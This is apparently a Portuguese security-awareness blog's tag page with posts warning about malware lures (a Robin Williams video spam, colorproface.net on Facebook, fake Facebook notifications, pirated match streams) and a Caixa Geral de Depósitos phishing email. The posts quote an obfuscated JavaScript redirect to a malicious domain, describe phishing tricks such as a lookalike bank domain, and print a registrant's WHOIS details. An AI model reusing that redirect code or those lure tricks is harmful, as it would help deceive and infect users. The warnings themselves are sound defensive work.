Todos os posts tagados malware

Morte do Robin Williams serve de isco para vírus

Morte do actor Robin Williams serve de isco para vírus

Diversas campanhas de spam estão a circular com a mensagem de poder ver um vídeo do Robin Williams com as últimas palavras do actor/comediante.
É uma prova que os utilizadores maliciosos acompanham as últimas tendências (muitos com sistemas automáticos de leitura do Google Trends) para propagar malware e atingir os seus objectivos.

No email que tive acesso, é possível ver uma imagem do Robin Williams juntamente com o assunto:

Robin Williams Dies, See His Last Words On Video

O email inclui um link (codificado em hexadecimal quando passamos com o cursor do rato) para um site malicioso com um payload para descarregar uma actualização do Flash Player (malware).

Se por acaso recebeu este email e instalou este malware, deverá removê-lo rapidamente utilizando o seu antivirus.

Malware colorproface.net circula no Facebook

colorproface

Um novo malware está a ser propagado no Facebook. A mensagem está a ser publicada em diversos grupos do Facebook e utilizadores infetados estão a tornar este malware viral.

A mensagem que transmite este malware é:

Olha que interessante essas novas cores pro facebook.

http://colorproface.net

O domínio colorproface.net foi registado no GoDaddy com a seguinte informação:

Creation Date: 2014-06-09 14:00:54
Registry Registrant ID:
Registrant Name: manusclecio albuquerque
Registrant Organization: hwuaye
Registrant Street: rua maria da penha 2379
Registrant City: Belem
Registrant State/Province: Para
Registrant Postal Code: 00000-000
Registrant Country: Brazil
Registrant Phone: +55.0
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

O site apresenta malware, o que significa que a própria visita poderá infectar o seu sistema.

script_malicioso

Basicamente este código javascript ofuscado, carrega um iframe para tentar o download de um ficheiro malicioso intitulado de coresparaseuface.exe.

Submeti a amostra ao VirusTotal e reparei na baixa taxa de deteção deste ficheiro. É bastante perigoso.

O malware, para além de realmente mudar as cores do Facebook, efetua alterações nocivas no registo do sistema operativo Windows.
Algumas pistas indicam ser um malware de origem brasileira, como já é habitual pelo idioma partilhado.

Fica o meu agradecimento ao nosso parceiro Miúdos Seguros na Net pela divulgação desta fraude.

Falsa notificação do Facebook leva a malware

Falsa notificação do Facebook leva a malware

Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.

Assunto do email:

[Username], you have pending messages

Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:

ip_malicioso/~up1adstop/coldness.php

O código-fonte deste site (ofuscado):

bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);

… que depois de traduzido reencaminha para outro site malicioso:

setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);

De referir que o primeiro url é detectado pelos antivirus online  com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.

No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.

Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.

Transmissão online do Porto vs Benfica leva a malware

Transmissão online do Porto - Benfica leva a malware

Fica o alerta para os diversos links de supostas transmissões online do jogo de futebol Porto – Benfica, que irá ser transmitido hoje na Sport TV.
Alguns deles até podem mostrar o jogo mas ao mesmo tempo inundam a página com adware/malware.
Neste tipo de esquemas também já começam aparecer links com Likejacking, onde o utilizador ao clicar no botão Play, também está a Gostar de uma página/link no Facebook para poder ver a transmissão pirata. Desta forma este esquema propaga-se pela lista de amigos da vítima.

Tenham sempre em atenção os links que abrem e verifiquem sempre a sua veracidade.
Fica a dica.

Mensagem importante – Phishing da CGD

cgd_phishing2

Anda a circular pelas caixas de email dos portugueses um novo email de phishing do banco Caixa Geral de Depósitos. O remetente desta nova campanha fraudulenta é o email [email protected]. De salientar a semelhança com o endereço do banco – cgd.pt.
O ccgd.pt está registado desde 2006 na DNS.PT por um Centro de Contabilidade, Gestão e Desenvolvimento e poderá estar a ser vítima desta situação.
Os utilizadores maliciosos utilizam esta semelhança com o domínio do banco para ganhar alguma credibilidade e desta forma aumentar o número de vítimas.

O assunto da mensagem é Mensagem importante e informa o destinatário que houve diversas tentativas falhadas de autenticação na conta online e a mesma foi bloqueada como precaução. Para desbloquear terá de entrar num endereço fraudulento (detectado como endereço de phishing pelo VirusTotal  e como distribuidor de malware pelo Sucuri). Este endereço apresentava uma cópia do site da Caixa Geral de Depósitos que tinha como objectivo gravar a informação da vítima. No decorrer da escrita deste artigo, o site apresenta uma loja de comercialização de produtos relacionados com sexo.
Certamente irão surgir outros emails com outros links comprometidos e com páginas de phishing.

Como evitar este tipo de ataques:

  • Verificar sempre o endereço da barra de navegação do browser
  • As páginas das entidades bancárias tem sempre um certificado de segurança (o endereço começa por https)
  • As entidades bancárias nunca lhe vão solicitar informação por email
  • Fazer pesquisas nos motores de busca sobre o email

Para concluir, baseado no número de emails que tenho recebido pessoalmente e de utilizadores do WebSegura.net, circulam com grande actividade os emails de phishing da Apple, da Caixa Geral de Depósitos e do Montepio.

Gostaria de agradecer à Linxisp pelo contributo à elaboração este artigo.